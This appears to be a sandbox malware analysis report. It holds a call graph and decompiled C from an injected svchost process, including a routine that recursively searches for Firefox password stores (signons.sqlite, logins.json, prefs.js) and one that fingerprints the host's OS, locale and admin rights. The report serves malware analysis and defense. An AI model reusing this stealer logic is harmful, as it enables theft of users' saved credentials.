6271->6275 6274 bc06b84 lstrlenA StrCmpNIA 6272->6274 6272->6275 6273->6275 6274->6275 6276 bc06c47 6275->6276 6279 bc06bd4 6275->6279 6294 bc06347 6275->6294 6281 bc08d3d LocalFree 6276->6281 6278 bc08ee2 5 API calls 6280 bc06be6 6278->6280 6279->6278 6279->6280 6282 bc06347 3 API calls 6280->6282 6281->6264 6283 bc06bf5 6282->6283 6283->6276 6284 bc08c6d lstrlenA 6283->6284 6285 bc06c27 6284->6285 6286 bc08c6d lstrlenA 6285->6286 6287 bc06c31 6286->6287 6288 bc08c6d lstrlenA 6287->6288 6289 bc06c39 6288->6289 6290 bc08d3d LocalFree 6289->6290 6291 bc06c41 6290->6291 6292 bc08d3d LocalFree 6291->6292 6292->6276 6293->6267 6295 bc06357 6294->6295 6299 bc0636d 6294->6299 6296 bc06373 6295->6296 6298 bc06365 6295->6298 6295->6299 6296->6299 6303 bc08d51 LocalAlloc 6296->6303 6298->6299 6304 bc08d51 LocalAlloc 6298->6304 6299->6279 6301 bc063d3 6302 bc08d91 2 API calls 6301->6302 6302->6299 6303->6299 6304->6301 6205 bc01e8d 6207 bc01e65 6205->6207 6206 bc01ec6 6207->6206 6208 bc03f20 41 API calls 6207->6208 6209 bc07461 24 API calls 6207->6209 6210 bc04125 37 API calls 6207->6210 6211 bc05547 51 API calls 6207->6211 6212 bc06007 47 API calls 6207->6212 6213 bc06dab 93 API calls 6207->6213 6214 bc0582c 54 API calls 6207->6214 6215 bc061af 50 API calls 6207->6215 6216 bc073b2 58 API calls 6207->6216 6217 bc02213 40 API calls 6207->6217 6218 bc03c33 24 API calls 6207->6218 6219 bc02a37 50 API calls 6207->6219 6220 bc03c57 54 API calls 6207->6220 6221 bc06e59 95 API calls 6207->6221 6222 bc0585e 54 API calls 6207->6222 6223 bc048de 19 API calls 6207->6223 6224 bc0441f 39 API calls 6207->6224 6225 bc02eff 50 API calls 6207->6225 6226 bc06f5f 25 API calls 6207->6226 6208->6207 6209->6207 6210->6207 6211->6207 6212->6207 6213->6207 6214->6207 6215->6207 6216->6207 6217->6207 6218->6207 6219->6207 6220->6207 6221->6207 6222->6207 6223->6207 6224->6207 6225->6207 6226->6207 6173 bc0576e 6176 bc055d9 6173->6176 6177 bc090fc 2 API calls 6176->6177 6178 bc055ea 6177->6178 6179 bc05769 6178->6179 6180 bc08ff4 7 API calls 6178->6180 6181 bc055fd 6180->6181 6181->6179 6182 bc09be0 4 API calls 6181->6182 6183 bc05614 6182->6183 6184 bc05634 6183->6184 6200 bc08d51 LocalAlloc 6183->6200 6185 bc05717 StrStrA 6184->6185 6192 bc091e5 3 API calls 6184->6192 6197 bc08d3d LocalFree 6184->6197 6198 bc021b7 5 API calls 6184->6198 6199 bc08c6d lstrlenA 6184->6199 6187 bc05641 StrStrIA 6185->6187 6193 bc05725 6185->6193 6189 bc05655 StrStrA 6187->6189 6187->6193 6188 bc05625 6190 bc08d91 2 API calls 6188->6190 6191 bc05672 lstrlenA 6189->6191 6189->6193 6190->6184 6191->6184 6192->6184 6194 bc08d3d LocalFree 6193->6194 6195 bc05760 6194->6195 6196 bc0907f 3 API calls 6195->6196 6196->6179 6197->6184 6198->6184 6199->6184 6200->6188 6126 bc0bc50 RtlUnwind 6227 bc0b810 6228 bc0b849 6227->6228 6229 bc0b83c 6227->6229 6231 bc09fdc __except_handler4 5 API calls 6228->6231 6230 bc09fdc __except_handler4 5 API calls 6229->6230 6230->6228 6237 bc0b859 __except_handler4 __IsNonwritableInCurrentImage 6231->6237 6232 bc0b8dc 6233 bc0b8cc 6235 bc09fdc __except_handler4 5 API calls 6233->6235 6234 bc09fdc __except_handler4 5 API calls 6234->6233 6235->6232 6237->6232 6242 bc0b8b2 __except_handler4 6237->6242 6243 bc0bac2 RtlUnwind 6237->6243 6238 bc0b92e __except_handler4 6239 bc0b962 6238->6239 6240 bc09fdc __except_handler4 5 API calls 6238->6240 6241 bc09fdc __except_handler4 5 API calls 6239->6241 6240->6239 6241->6242 6242->6232 6242->6233 6242->6234 6243->6238 6305 bc075b0 6306 bc075c0 6305->6306 6313 bc0766c 6305->6313 6307 bc07603 lstrcmpW 6306->6307 6306->6313 6308 bc07617 6307->6308 6307->6313 6309 bc0762c lstrlenA 6308->6309 6310 bc07643 6309->6310 6311 bc09be0 4 API calls 6310->6311 6312 bc0765e lstrlenA 6311->6312 6312->6313 6314 bc0ba30 6315 bc0ba42 6314->6315 6317 bc0ba50 @_EH4_CallFilterFunc@8 6314->6317 6316 bc09fdc __except_handler4 5 API calls 6315->6316 6316->6317 6318 bc072b4 6319 bc08ff4 7 API calls 6318->6319 6320 bc072c8 6319->6320 6321 bc073ad 6320->6321 6323 bc0909f 6 API calls 6320->6323 6341 bc073a2 6320->6341 6322 bc0907f 3 API calls 6322->6321 6324 bc072eb 6323->6324 6324->6341 6344 bc071fa WideCharToMultiByte 6324->6344 6327 bc071fa 9 API calls 6328 bc07311 6327->6328 6329 bc071fa 9 API calls 6328->6329 6332 bc07320 6329->6332 6330 bc0738c 6331 bc08d3d LocalFree 6330->6331 6334 bc07394 6331->6334 6332->6330 6333 bc07334 lstrlenA 6332->6333 6335 bc07345 6333->6335 6336 bc08d3d LocalFree 6334->6336 6338 bc01000 2 API calls 6335->6338 6337 bc0739a 6336->6337 6339 bc08d3d LocalFree 6337->6339 6340 bc07360 6338->6340 6339->6341 6340->6330 6342 bc07121 6 API calls 6340->6342 6341->6322 6343 bc07380 LocalFree 6342->6343 6343->6330 6345 bc07228 6344->6345 6357 bc07286 6344->6357 6362 bc08d51 LocalAlloc 6345->6362 6347 bc08d3d LocalFree 6349 bc072ab 6347->6349 6348 bc0722d WideCharToMultiByte 6350 bc07242 6348->6350 6351 bc0724a 6348->6351 6349->6327 6352 bc08d3d LocalFree 6350->6352 6353 bc07253 StrStrIA 6351->6353 6351->6357 6352->6351 6354 bc07266 lstrlenA 6353->6354 6353->6357 6355 bc0727c 6354->6355 6354->6357 6356 bc07288 lstrlenA 6355->6356 6355->6357 6356->6357 6358 bc07293 6356->6358 6357->6347 6363 bc08d51 LocalAlloc 6358->6363 6360 bc07298 6361 bc08d91 2 API calls 6360->6361 6361->6357 6362->6348 6363->6360 6127 bc06c58 6128 bc06d58 6127->6128 6129 bc06c6b 6127->6129 6129->6128 6130 bc06c8d lstrcmpiA 6129->6130 6130->6128 6131 bc06ca3 6130->6131 6131->6128 6132 bc06cb9 lstrcmpA 6131->6132 6132->6128 6133 bc06ccf 6132->6133 6133->6128 6134 bc03786 StrStrIA 6133->6134 6135 bc06d22 6134->6135 6135->6128 6136 bc0341e 9 API calls 6135->6136 6136->6128 6364 bc05e3a 6365 bc0491e 2 API calls 6364->6365 6366 bc05e80 6365->6366 6367 bc05ecb WideCharToMultiByte 6366->6367 6368 bc05e9e WideCharToMultiByte CoTaskMemFree 6366->6368 6370 bc05f33 6367->6370 6368->6367 6369 bc05fb9 6371 bc09fdc __except_handler4 5 API calls 6369->6371 6370->6369 6372 bc05f43 lstrcmpiA 6370->6372 6373 bc05fc6 6371->6373 6374 bc05f5b lstrcmpiA 6372->6374 6375 bc05f6d lstrcmpiA 6372->6375 6374->6375 6376 bc05fad CoTaskMemFree 6374->6376 6377 bc05fc8 lstrcmpiA 6375->6377 6379 bc05f7f 6375->6379 6376->6369 6378 bc05fe1 lstrcmpiA 6377->6378 6377->6379 6378->6376 6378->6379 6382 bc05d2b 6379->6382 6383 bc09be0 4 API calls 6382->6383 6384 bc05d50 6383->6384 6385 bc05e2b 6384->6385 6386 bc05d5d wsprintfA 6384->6386 6387 bc09fdc __except_handler4 5 API calls 6385->6387 6388 bc05de9 6386->6388 6389 bc05da9 6386->6389 6390 bc05e38 6387->6390 6392 bc08c6d lstrlenA 6388->6392 6391 bc09c42 7 API calls 6389->6391 6390->6376 6396 bc05db1 6391->6396 6394 bc05dfd 6392->6394 6393 bc08d3d LocalFree 6393->6385 6395 bc08c6d lstrlenA 6394->6395 6398 bc05de4 6395->6398 6397 bc08c6d lstrlenA 6396->6397 6396->6398 6399 bc05dcb 6397->6399 6398->6393 6400 bc08c6d lstrlenA 6399->6400 6401 bc05dd6 6400->6401 6402 bc08c6d lstrlenA 6401->6402 6403 bc05dde 6402->6403 6404 bc08d3d LocalFree 6403->6404 6404->6398 6137 bc02c5d 6149 bc09af4 6137->6149 6140 bc02c86 6141 bc09af4 lstrlenA 6140->6141 6142 bc02c8e 6141->6142 6143 bc02cba lstrcmpiA 6142->6143 6145 bc02ccb lstrlenA 6142->6145 6143->6142 6144 bc02c7f 6143->6144 6145->6144 6146 bc02cda lstrcmpiA 6145->6146 6146->6144 6147 bc02cf0 lstrcmpiA 6146->6147 6147->6144 6148 bc02d06 lstrcmpiA 6147->6148 6148->6144 6151 bc09af7 6149->6151 6150 bc09b48 lstrlenA 6150->6151 6152 bc02c6d StrStrIA 6150->6152 6151->6150 6151->6152 6152->6140 6152->6144 6153 bc074de 6154 bc074f1 6153->6154 6160 bc075a8 6153->6160 6155 bc07512 lstrcmpiW 6154->6155 6154->6160 6156 bc07528 6155->6156 6155->6160 6157 bc0753c lstrcmpW 6156->6157 6156->6160 6158 bc0754e 6157->6158 6157->6160 6159 bc0341e 9 API calls 6158->6159 6158->6160 6159->6160

                                                                                                                                        Executed Functions

                                                                                                                                        Function 0BC06401, Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 227stringfileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 22 bc06401-bc0643d 23 bc06443-bc06446 22->23 24 bc066fc 22->24 23->24 25 bc0644c-bc0645b call bc08f95 23->25 26 bc066fe-bc06712 call bc08d3d call bc09fdc 24->26 31 bc06462-bc0649d call bc08ee2 call bc08d5e FindFirstFileA 25->31 32 bc0645d 25->32 39 bc064a3 31->39 40 bc066f4-bc066fa 31->40 32->31 41 bc064a8-bc064b5 39->41 40->26 42 bc06530-bc06537 41->42 43 bc064b7-bc064c7 lstrcmpiA 41->43 44 bc06585-bc06595 StrStrIA 42->44 45 bc06539-bc06547 StrStrIA 42->45 46 bc066cd-bc066e2 FindNextFileA 43->46 47 bc064cd-bc064dd lstrcmpiA 43->47 49 bc06610-bc06620 lstrlenA 44->49 50 bc06597-bc065be call bc08ee2 call bc08f32 call bc090fc 44->50 45->46 51 bc0654d-bc06580 call bc08ee2 call bc08f32 call bc01f01 call bc08d3d 45->51 46->41 48 bc066e8-bc066ee FindClose 46->48 47->46 52 bc064e3-bc064ed call bc08f95 47->52 48->40 56 bc06631-bc06641 StrStrIA 49->56 57 bc06622-bc0662f 49->57 88 bc065c0-bc065ce call bc01f70 50->88 89 bc06604-bc0660f call bc08d3d 50->89 51->46 65 bc064f3 52->65 66 bc064ef-bc064f1 52->66 61 bc06662-bc0669f StrStrIA * 3 56->61 62 bc06643-bc0665f call bc08ee2 call bc08f32 call bc08d3d 56->62 57->56 58 bc066ae-bc066ca call bc08ee2 call bc08f32 call bc08d3d 57->58 58->46 61->58 68 bc066a1-bc066a8 61->68 62->61 72 bc064f5-bc0651d call bc08ee2 call bc08f32 call bc06401 65->72 66->72 68->58 74 bc066aa-bc066ac 68->74 103 bc06522-bc0652b call bc08d3d 72->103 74->46 74->58 88->89 102 bc065d0-bc065e4 call bc061df 88->102 89->49 108 bc065e6-bc065f9 call bc06d60 call bc06328 102->108 109 bc065fe 102->109 103->46 108->109 109->89
                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                        			E0BC06401(void* __edx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12, char* _a16) {
				signed int _v8;
				struct _WIN32_FIND_DATAA _v332;
				char* _v336;
				CHAR* _v340;
				intOrPtr _v344;
				CHAR* _v348;
				void* _v352;
				intOrPtr _v356;
				char* _v360;
				char* _v364;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				void* _t60;
				CHAR* _t61;
				void* _t66;
				char* _t68;
				int _t70;
				char* _t72;
				char* _t78;
				int _t84;
				char* _t95;
				char* _t96;
				char* _t99;
				void* _t108;
				char* _t109;
				char* _t114;
				void* _t136;
				void* _t137;
				void* _t140;
				CHAR* _t141;
				signed int _t144;
				void* _t145;

				_t140 = __edx;
				_t53 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t53 ^ _t144;
				_v344 = _a4;
				_t114 = _a16;
				_v348 = _a8;
				_v356 = _a12;
				_v360 = _t114;
				if(_t114 == 0 ||  *_t114 == 0) {
					_push(0);
					goto L35;
				} else {
					_t142 = _t114;
					_t60 = E0BC08F95(_t114);
					_push(_t114);
					_t61 = "\\*.*";
					if(_t60 != 0) {
						_t61 = "*.*";
					}
					_v340 = E0BC08EE2(_t61);
					E0BC08D5E( &_v332,  &_v332, 0, 0x140);
					_t66 = FindFirstFileA(_v340,  &_v332); // executed
					_v352 = _t66;
					if(_t66 == 0xffffffff) {
						L33:
						_push(_v340);
						L35:
						return E0BC09FDC(E0BC08D3D(), _t114, _v8 ^ _t144, _t140, _t141, _t142);
					}
					_t141 = "\\";
					do {
						if((_v332.dwFileAttributes & 0x00000010) == 0) {
							__eflags =  *0xbc10d54 - 3;
							if( *0xbc10d54 != 3) {
								_t142 = StrStrIA;
								_t68 = StrStrIA( &(_v332.cFileName), "signons.sqlite");
								__eflags = _t68;
								if(_t68 != 0) {
									_v336 = E0BC08F32(E0BC08EE2(_t141, _t114),  &(_v332.cFileName));
									__eflags = E0BC090FC(_t92);
									if(__eflags != 0) {
										_t95 = E0BC01F70(__eflags, _v336);
										_pop(_t136);
										__eflags = _t95;
										if(_t95 == 0) {
											_t96 = E0BC061DF(_v348, _t136, _v356);
											_pop(_t137);
											__eflags = _t96;
											if(__eflags != 0) {
												E0BC06D60(_t137, __eflags, _v344, _v336);
												E0BC06328();
											}
											_t114 = _v360;
										}
									}
									E0BC08D3D(_v336);
								}
								_t70 = lstrlenA( &(_v332.cFileName));
								__eflags = _t70 - 2;
								if(_t70 < 2) {
									L25:
									_t72 = StrStrIA( &(_v332.cFileName), "logins.json");
									__eflags = _t72;
									if(_t72 != 0) {
										E0BC08D3D(E0BC08F32(E0BC08EE2(_t141, _t114),  &(_v332.cFileName)));
										_t145 = _t145 + 0xc;
									}
									_v336 = StrStrIA( &(_v332.cFileName), "signons.txt");
									_v364 = StrStrIA( &(_v332.cFileName), "signons2.txt");
									_t78 = StrStrIA( &(_v332.cFileName), "signons3.txt");
									__eflags = _v336;
									if(_v336 == 0) {
										__eflags = _v364;
										if(_v364 != 0) {
											goto L30;
										}
										__eflags = _t78;
										if(_t78 == 0) {
											goto L31;
										}
									}
									goto L30;
								} else {
									__eflags =  *((intOrPtr*)(_t144 + _t70 - 0x11e)) - 0x732e;
									if( *((intOrPtr*)(_t144 + _t70 - 0x11e)) == 0x732e) {
										L30:
										E0BC08D3D(E0BC08F32(E0BC08EE2(_t141, _t114),  &(_v332.cFileName)));
										_t145 = _t145 + 0xc;
										goto L31;
									}
									goto L25;
								}
							}
							_t99 = StrStrIA( &(_v332.cFileName), "prefs.js");
							__eflags = _t99;
							if(_t99 != 0) {
								_t142 = E0BC08F32(E0BC08EE2(_t141, _t114),  &(_v332.cFileName));
								E0BC01F01(__eflags, _v344, _t102, 0xbeef0001);
								_t145 = _t145 + 0x14;
								E0BC08D3D(_t102);
							}
							goto L31;
						}
						_t142 = lstrcmpiA;
						if(lstrcmpiA(".",  &(_v332.cFileName)) != 0 && lstrcmpiA("..",  &(_v332.cFileName)) != 0) {
							_t108 = E0BC08F95(_t114);
							_push(_t114);
							if(_t108 != 0) {
								_t109 = 0;
								__eflags = 0;
							} else {
								_t109 = _t141;
							}
							_t142 = E0BC08F32(E0BC08EE2(_t109),  &(_v332.cFileName));
							E0BC06401(_t140, _v344, _v348, _v356, _t111); // executed
							E0BC08D3D(_t111);
							_t145 = _t145 + 0x1c;
						}
						L31:
						_t84 = FindNextFileA(_v352,  &_v332); // executed
					} while (_t84 != 0);
					FindClose(_v352); // executed
					goto L33;
				}
			}





































                                                                                                                                        0x0bc06401
                                                                                                                                        0x0bc0640a
                                                                                                                                        0x0bc06411
                                                                                                                                        0x0bc06417
                                                                                                                                        0x0bc06421
                                                                                                                                        0x0bc06424
                                                                                                                                        0x0bc0642f
                                                                                                                                        0x0bc06435
                                                                                                                                        0x0bc0643d
                                                                                                                                        0x0bc066fc
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0644c
                                                                                                                                        0x0bc0644c
                                                                                                                                        0x0bc0644e
                                                                                                                                        0x0bc06455
                                                                                                                                        0x0bc06456
                                                                                                                                        0x0bc0645b
                                                                                                                                        0x0bc0645d
                                                                                                                                        0x0bc0645d
                                                                                                                                        0x0bc0646d
                                                                                                                                        0x0bc0647c
                                                                                                                                        0x0bc0648e
                                                                                                                                        0x0bc06494
                                                                                                                                        0x0bc0649d
                                                                                                                                        0x0bc066f4
                                                                                                                                        0x0bc066f4
                                                                                                                                        0x0bc066fe
                                                                                                                                        0x0bc06712
                                                                                                                                        0x0bc06712
                                                                                                                                        0x0bc064a3
                                                                                                                                        0x0bc064a8
                                                                                                                                        0x0bc064b5
                                                                                                                                        0x0bc06530
                                                                                                                                        0x0bc06537
                                                                                                                                        0x0bc06585
                                                                                                                                        0x0bc06591
                                                                                                                                        0x0bc06593
                                                                                                                                        0x0bc06595
                                                                                                                                        0x0bc065b1
                                                                                                                                        0x0bc065bc
                                                                                                                                        0x0bc065be
                                                                                                                                        0x0bc065c6
                                                                                                                                        0x0bc065cb
                                                                                                                                        0x0bc065cc
                                                                                                                                        0x0bc065ce
                                                                                                                                        0x0bc065dc
                                                                                                                                        0x0bc065e1
                                                                                                                                        0x0bc065e2
                                                                                                                                        0x0bc065e4
                                                                                                                                        0x0bc065f2
                                                                                                                                        0x0bc065f9
                                                                                                                                        0x0bc065f9
                                                                                                                                        0x0bc065fe
                                                                                                                                        0x0bc065fe
                                                                                                                                        0x0bc065ce
                                                                                                                                        0x0bc0660a
                                                                                                                                        0x0bc0660f
                                                                                                                                        0x0bc06617
                                                                                                                                        0x0bc0661d
                                                                                                                                        0x0bc06620
                                                                                                                                        0x0bc06631
                                                                                                                                        0x0bc0663d
                                                                                                                                        0x0bc0663f
                                                                                                                                        0x0bc06641
                                                                                                                                        0x0bc0665a
                                                                                                                                        0x0bc0665f
                                                                                                                                        0x0bc0665f
                                                                                                                                        0x0bc06670
                                                                                                                                        0x0bc06684
                                                                                                                                        0x0bc06696
                                                                                                                                        0x0bc06698
                                                                                                                                        0x0bc0669f
                                                                                                                                        0x0bc066a1
                                                                                                                                        0x0bc066a8
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc066aa
                                                                                                                                        0x0bc066ac
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc066ac
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06622
                                                                                                                                        0x0bc06627
                                                                                                                                        0x0bc0662f
                                                                                                                                        0x0bc066ae
                                                                                                                                        0x0bc066c5
                                                                                                                                        0x0bc066ca
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc066ca
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0662f
                                                                                                                                        0x0bc06620
                                                                                                                                        0x0bc0653f
                                                                                                                                        0x0bc06545
                                                                                                                                        0x0bc06547
                                                                                                                                        0x0bc06563
                                                                                                                                        0x0bc06571
                                                                                                                                        0x0bc06576
                                                                                                                                        0x0bc0657a
                                                                                                                                        0x0bc0657f
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06547
                                                                                                                                        0x0bc064b7
                                                                                                                                        0x0bc064c7
                                                                                                                                        0x0bc064e5
                                                                                                                                        0x0bc064ea
                                                                                                                                        0x0bc064ed
                                                                                                                                        0x0bc064f3
                                                                                                                                        0x0bc064f3
                                                                                                                                        0x0bc064ef
                                                                                                                                        0x0bc064ef
                                                                                                                                        0x0bc064ef
                                                                                                                                        0x0bc06508
                                                                                                                                        0x0bc0651d
                                                                                                                                        0x0bc06523
                                                                                                                                        0x0bc06528
                                                                                                                                        0x0bc06528
                                                                                                                                        0x0bc066cd
                                                                                                                                        0x0bc066da
                                                                                                                                        0x0bc066e0
                                                                                                                                        0x0bc066ee
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc066ee

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC08F95: lstrlenA.KERNEL32(?,0BC09A2B,?,?,?), ref: 0BC08F9F
                                                                                                                                        • FindFirstFileA.KERNELBASE(?,?,?,00000000,00000140), ref: 0BC0648E
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0D7EC,?), ref: 0BC064C3
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0D7F0,?), ref: 0BC064D9
                                                                                                                                        • StrStrIA.SHLWAPI(?,prefs.js), ref: 0BC0653F
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(HWID), ref: 0BC08F0C
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcpyA.KERNEL32(00000000,00000000), ref: 0BC08F1D
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        • StrStrIA.SHLWAPI(?,signons.sqlite), ref: 0BC06591
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0BC06617
                                                                                                                                        • StrStrIA.SHLWAPI(?,logins.json), ref: 0BC0663D
                                                                                                                                        • StrStrIA.SHLWAPI(?,signons.txt), ref: 0BC0666E
                                                                                                                                        • StrStrIA.SHLWAPI(?,signons2.txt), ref: 0BC06682
                                                                                                                                        • StrStrIA.SHLWAPI(?,signons3.txt), ref: 0BC06696
                                                                                                                                        • FindNextFileA.KERNELBASE(?,00000010), ref: 0BC066DA
                                                                                                                                        • FindClose.KERNELBASE(?), ref: 0BC066EE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Find$Filelstrcatlstrcmpilstrcpy$CloseFirstFreeLocalNext
                                                                                                                                        • String ID: *.*$\*.*$logins.json$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                                                                                                        • API String ID: 549939916-2271207088
                                                                                                                                        • Opcode ID: 3780b5be003a59aaaea6a736c57fe211d0b5945237f52a01f4361b113b162c31
                                                                                                                                        • Instruction ID: b6f13c408bba2ebc8e5cff11bd9a0db3d1bec0bb05e9a9370fae518a5beabbd1
                                                                                                                                        • Opcode Fuzzy Hash: 3780b5be003a59aaaea6a736c57fe211d0b5945237f52a01f4361b113b162c31
                                                                                                                                        • Instruction Fuzzy Hash: 59718271931229AFDF25AFA4DC46BEE77A9AF05310F0080B5E909E61D0DE709F949F60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        Function 0BC02741, Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 219libraryloadermemoryUNIQUE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                        			E0BC02741(void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				struct _OSVERSIONINFOA _v172;
				signed int _v176;
				signed int _v180;
				char _v184;
				void* _v188;
				intOrPtr _v192;
				struct _SYSTEM_INFO _v228;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				int _t65;
				signed int _t70;
				char* _t72;
				int _t73;
				int _t75;
				int _t79;
				signed int _t80;
				signed int _t81;
				void* _t84;
				struct HINSTANCE__* _t88;
				_Unknown_base(*)()* _t95;
				struct HINSTANCE__* _t118;
				void* _t131;
				void* _t132;
				void* _t144;
				signed int _t149;
				intOrPtr* _t151;
				signed int _t152;

				_t58 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t58 ^ _t152;
				_t144 = __ecx;
				_v192 = E0BC08C9C(__ecx, __edx, __eflags, 0);
				_v176 = 0xbeef0001;
				E0BC08A41( &_v176, __ecx, __ecx, 4);
				_pop(_t131);
				E0BC08D5E( &_v172,  &_v172, 0, 0x9c);
				_v172.dwOSVersionInfoSize = 0x9c;
				_t65 = GetVersionExA( &_v172);
				_t143 = _t65;
				E0BC08D5E( &(_v172.szCSDVersion),  &(_v172.szCSDVersion), 0, 0x80);
				_push(4);
				if(_t65 == 0) {
					_v176 = 0;
					E0BC08A41( &_v176, _t131, _t144);
				} else {
					_v176 = 0x9c;
					E0BC08A41( &_v176, _t131, _t144);
					E0BC08A41( &_v172, _t131, _t144, 0x9c);
				}
				_v180 = _v180 & 0x00000000;
				_pop(_t132);
				_t118 = GetModuleHandleA("kernel32.dll");
				if(_t118 == 0 || GetProcAddress(_t118, "GetNativeSystemInfo") == 0) {
					_t70 = 0;
					__eflags = 0;
					goto L9;
				} else {
					_t151 = GetProcAddress(_t118, "IsWow64Process");
					if(_t151 != 0) {
						 *_t151(GetCurrentProcess(),  &_v180);
					}
					_t70 = 0 | _v180 != 0x00000000;
					L9:
					E0BC08C37(_t70);
					_t72 = LocalAlloc(0x40, 0x480);
					_v180 = _t72;
					_t73 = GetLocaleInfoA(0x400, 0x1002, _t72, 0x3ff); // executed
					_v188 = _t73;
					E0BC08C37(_t73);
					if(_v188 != 0) {
						_t105 = _v180;
						if(_v180 != 0) {
							E0BC08C4D(_t105, _t132, _v188);
							_pop(_t132);
						}
					}
					_t75 = GetLocaleInfoA(0x400, 0x1001, _v180, 0x3ff);
					_t147 = _t75;
					E0BC08C37(_t75);
					if(_t75 != 0) {
						_t103 = _v180;
						if(_v180 != 0) {
							E0BC08C4D(_t103, _t132, _t147);
							_pop(_t132);
						}
					}
					_v176 = 0;
					_v16.Value = 0;
					_v12 = 0x500;
					_t79 = AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v188);
					_t163 = _t79;
					if(_t79 != 0) {
						_t80 =  &_v176;
						__imp__CheckTokenMembership(0, _v188, _t80); // executed
						__eflags = _t80;
						if(__eflags == 0) {
							goto L16;
						}
						FreeSid(_v188);
						_t81 = _v176;
						goto L19;
					} else {
						L16:
						_t81 = 0;
						L19:
						E0BC08C37(_t81); // executed
						E0BC026A0(_t143, _t144, _t147, _t163); // executed
						_t84 = E0BC099B0( &_v184, _t143); // executed
						_t148 = _t84;
						if(_t84 == 0 || _v184 < 0x14) {
							_t47 =  &_v176;
							 *_t47 = _v176 & 0x00000000;
							__eflags =  *_t47;
							E0BC08A41( &_v176, _t132, _t144, 4);
						} else {
							_v184 = _v184 + 4;
							E0BC08C37(_v184);
							_v184 = _v184 - 4;
							_v176 = _v176 | 0xffffffff;
							E0BC08A41( &_v176, _t132, _t144, 4);
							E0BC08C4D(_t148, _t132, _v184);
						}
						E0BC08D3D(_t148);
						E0BC08D3D(_v180);
						_pop(_t135);
						_t88 = GetModuleHandleA("kernel32.dll");
						if(_t88 == 0) {
							L26:
							GetSystemInfo( &_v228);
							goto L27;
						} else {
							_t95 = GetProcAddress(_t88, "GetNativeSystemInfo");
							_t167 = _t95;
							if(_t95 == 0) {
								goto L26;
							}
							_t135 =  &_v228;
							 *_t95( &_v228); // executed
							L27:
							_t149 = 0x24;
							_v176 = _t149;
							E0BC08A41( &_v176, _t135, _t144, 4);
							E0BC08A41( &_v228, _t135, _t144, _t149);
							return E0BC09FDC(E0BC08D0C(_t144, _v192, _t167), _v192, _v8 ^ _t152, _t143, _t144, _t149);
						}
					}
				}
			}



































                                                                                                                                        0x0bc0274a
                                                                                                                                        0x0bc02751
                                                                                                                                        0x0bc02759
                                                                                                                                        0x0bc02768
                                                                                                                                        0x0bc0276e
                                                                                                                                        0x0bc02778
                                                                                                                                        0x0bc0277e
                                                                                                                                        0x0bc0278f
                                                                                                                                        0x0bc0279b
                                                                                                                                        0x0bc027a1
                                                                                                                                        0x0bc027ac
                                                                                                                                        0x0bc027b6
                                                                                                                                        0x0bc027bb
                                                                                                                                        0x0bc027bf
                                                                                                                                        0x0bc027e1
                                                                                                                                        0x0bc027ed
                                                                                                                                        0x0bc027c1
                                                                                                                                        0x0bc027c7
                                                                                                                                        0x0bc027cd
                                                                                                                                        0x0bc027d9
                                                                                                                                        0x0bc027de
                                                                                                                                        0x0bc027f2
                                                                                                                                        0x0bc027f9
                                                                                                                                        0x0bc02805
                                                                                                                                        0x0bc02809
                                                                                                                                        0x0bc02848
                                                                                                                                        0x0bc02848
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0281d
                                                                                                                                        0x0bc02825
